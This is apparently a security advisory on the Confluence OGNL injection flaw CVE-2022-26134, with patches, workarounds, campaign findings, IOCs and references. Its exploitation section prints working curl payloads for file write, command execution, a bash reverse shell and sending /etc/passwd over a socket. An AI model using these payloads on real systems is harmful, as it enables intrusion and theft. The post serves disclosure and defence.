A remote code execution vulnerability affecting Atlassian Confluence products has recently been identified and assigned CVE-2022-26134. This vulnerability is exploitable without requiring authentication and being actively exploited.
According to the initial analysis, the vulnerability is a code injection (OGNL Inyection), similar to other vulnerabilities that have been reported on other occasions.
Products affected by vulnerability CVE-2022-26134
- Atlassian Confluence Server.
- Atlassian Confluence Data Center.
According to official information published by Atlassian, all versions of Confluence Server and Data Center have been affected by CVE-2022-26134 vulnerability .
CVE-2022-26134 Workarounds and security patches
Patch for the Atlassian confluence vulnerability
Atlassian has released the following versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 which contain a fix for this issue.
Atlassian recommends upgrading to the latest Long Term Support release. The latest version can be downloaded from the Atlassian download centre.
If its not possible to upgrade Confluence immediately, a temporary workaround has been published-
CVE-2022-26134 Workaround
For Confluence 7.15.0 – 7.18.0
If Confluence runs in a cluster, this process will need to be repeated on each node. It is not necessary to shut down the whole cluster.
- Shut down Confluence.
- Download the following file to the Confluence server:
- Delete the following file from the Confluence install directory
<confluence-install>/confluence/WEB-INF/lib/xwork-1.0.3-atlassian-8.jar
- Copy the downloaded xwork-1.0.3-atlassian-10.jar into:
<confluence-install>/confluence/WEB-INF/lib/
- Check that permissions and ownership of xwork-1.0.3-atlassian-10.jar file matches the existing files in the same directory.
- Start Confluence.
For Confluence 7.0.0 – Confluence 7.14.2
- Shut down Confluence.
- Download the following files to the Confluence server:
CachedConfigurationProvider.class
- Delete the following files from the Confluence install directory:
<confluence-install>/confluence/WEB-INF/lib/xwork-1.0.3.6.jar
<confluence-install>/confluence/WEB-INF/lib/webwork-2.1.5-atlassian-3.jar
- Copy the downloaded xwork-1.0.3-atlassian-10.jar into <confluence-install>/confluence/WEB-INF/lib/
- Copy the downloaded webwork-2.1.5-atlassian-4.jar into <confluence-install>/confluence/WEB-INF/lib/
- Check that permissions and ownership of both new files matches the existing files in the same directory.
- Change context to the following directory <confluence-install>/confluence/WEB-INF/classes/com/atlassian/confluence/setup
7.1 Create a new directory called webwork
7.2 Copy CachedConfigurationProvider.class into:
<confluence-install>/confluence/WEB-INF/classes/com/atlassian/confluence/setup/webwork
7.3 Ensure the permissions and ownership are correct for:
<confluence-install>/confluence/WEB-INF/classes/com/atlassian/confluence/setup/webwork
7.4 Ensure the permissions and ownership are correct for:
<confluence-install>/confluence/WEB-INF/classes/com/atlassian/confluence/setup/webwork/CachedConfigurationProvider.class
8 Start Confluence.
Additional mitigations
The Atlassian security team has defined the following workarounds:
- Disable or restrict access to Confluence Server and Data Center instances exposed to the Internet.
- If the previous workaround is not possible, define rules at the WAF level blocking URLs that contain the sequence ${.
Server hardening techniques should also be taken into consideration. It is recommended to verify that Confluence Server is being executed as a non privileged user, verify that the server operating system in fully patched and has been restarted to ensure it is running a kernel without known vulnerabilities. Similarly, deploying an EDR agent could be very beneficial in detecting or preventing exploits or subsequent privilege escalations.
Given that the technical details of the exploit are already known and a patch exists, vulnerable systems need to be updated now.
Active exploit of vulnerability CVE-2022-26134
According to the analysis of the incident response process executed by Volexity last weekend, malicious activity was identified affecting Atlassian Confluence Server products. This analysis has been verified by rapid7, providing a large number of examples of these exploits.
Arbitrary file Write
Curl -v https://10.0.0.28:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/pwned%22%29%7D/
Which executes the following code:
${@java.lang.Runtime@getRuntime().exec(“touch /tmp/pwned”)}
Command execution
The following request executes the whoami command and returns the result of the command in the X-Cmd-Response header.
Curl -v https://10.0.0.28:8090/%24%7B%28%23ª%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23ª%29%29%7D/
This payload is decoded as follows:
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec(“whoami”).getInputStream(),”utf-8”)).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(“X-Cmd-Response”,#a))}
Reverse Shell
curl -v https://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/
again, the decoded code is as follows:
${new javax.script.ScriptEngineManager().getEngineByName(“nashorn”).eval(“new java.lang.ProcessBuilder().command(‘bash’,’-c’,’bash -i >& /dev/tcp/10.0.0.28/1270 0>&1′).start()”)}
Arbitrary file read: /etc/password
curl -v https://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22var%20data%20%3D%20new%20java.lang.String%28java.nio.file.Files.readAllBytes%28java.nio.file.Paths.get%28%27/etc/passwd%27%29%29%29%3Bvar%20sock%20%3D%20new%20java.net.Socket%28%2710.0.0.28%27%2C%201270%29%3B%20var%20output%20%3D%20new%20java.io.BufferedWriter%28new%20java.io.OutputStreamWriter%28sock.getOutputStream%28%29%29%29%3B%20output.write%28data%29%3B%20output.flush%28%29%3B%20sock.close%28%29%3B%22%29%7D/
decoded as:
${new javax.script.ScriptEngineManager().getEngineByName(“nashorn”).eval(“var data = new java.lang.String(java.nio.file.Files.readAllBytes(java.nio.file.Paths.get(‘/etc/passwd’)));var sock = new java.net.Socket(‘10.0.0.28’, 1270); var output = new java.io.BufferedWriter(new java.io.OutputStreamWriter(sock.getOutputStream())); output.write(data); output.flush(); sock.close();”)}
Attacks in progress
Analysis of the CVE-2022-26134 vulnerability in the context of current active exploitation campaigns has shown the following activities.
- Initial code execution and creation of child processes that invoke different shells (bash and python).
- JSP webshells being written to disk.
- Overwriting of existing Confluence Server resources to incorporate a webshell. Specifically, the following file:
- confluence root>/confluence/noop.jsp
- Deployment of other webshells to ensure access persistence to compromised systems, including a variant of the JSP China Chopper webshell, which has previously been used by various malicious actors. [1][2][3]
- Overwriting of existing Confluence Server resources to incorporate a webshell. Specifically, the following file:
- Deployment of the open source Behinder implant to allow a memory resident webshell (without the need to write to disk) and with interaction capabilities with meterpreter and Cobalt Strike.
The CVE-2022-26134 vulnerability has been added to the catalog of known exploited vulnerabilities compiled by the US government agency CISA (Cybersecurity & Infrastructure Security Agency).
IOCs
The following link includes indicators of compromise based on IP addresses involved in the current exploit campaign, as well as yara rules.
Information of the webshells deployed in the context of the analyzed campaign is shown below:
- Modified noop.jsp resource.
Filename | noop.jsp |
File Size | 537 bytes |
Hash MD5 | f8df4dd46f02dc86d37d46cf4793e036 |
Hash SHA1 | 4c02c3a150de6b70d6fca584c29888202cc1deef |
- Webshell JSP China Chopper variant.
Filename | *.jsp |
File Size | 8624 bytes |
Hash MD5 | ea18fb65d92e1f0671f23372bacf60e7 |
Hash SHA1 | 80b327ec19c7d14cc10511060ed3a4abffc821af |
References
- Zero-Day Exploitation of Atlassian Confluence – https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
- Security advisory issued by Atlassian – https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
- Security Alert CVE-2022-26134 issued by BugAlert – https://bugalert.org/content/notices/2022-06-02-confluence.html?src=tw
- IOCs – https://github.com/volexity/threat-intel/tree/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators
- Reglas SIGMA – https://github.com/SigmaHQ/sigma/pull/3087/commits/777b123ad0e673e30eb8b6c566dc353b338f0e87
- CISA – Known Exploited vulnerability catalog – https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog
- China Chopper Webshell – https://attack.mitre.org/software/S0020/
- Rapid7 analysis – https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134